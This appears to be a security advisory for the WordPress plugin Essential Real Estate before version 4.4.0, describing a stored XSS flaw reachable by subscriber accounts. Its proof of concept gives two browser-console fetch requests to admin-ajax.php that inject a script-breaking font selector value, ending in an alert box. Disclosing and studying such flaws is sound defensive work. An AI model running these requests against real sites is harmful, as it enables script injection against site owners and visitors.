Essential Real Estate < 4.4.0 - Subscriber+ Stored XSS

Description The plugin does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Stored XSS attacks.

PoC

1. Login with a subscriber account, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete 2. Paste the following in your browser’s console: fetch("/wp-admin/admin-ajax.php?action=gsf_change_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font;_data[kind]=custom&font;_data[selector]=ppppp`,"method": "POST",}).then((response) => {return response.text(); }).then((data) => {console.log(data);}) 3. And then the following: fetch("/wp-admin/admin-ajax.php?action=gsf_save_active_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font;[0][kind]=custom&font;[0][selector]=");alert(1);//`,"method": "POST",}).then((response) => {return response.text(); }).then((data) => {console.log(data);}) 4. Visit the site to witness our malicious script running, triggering an alert box.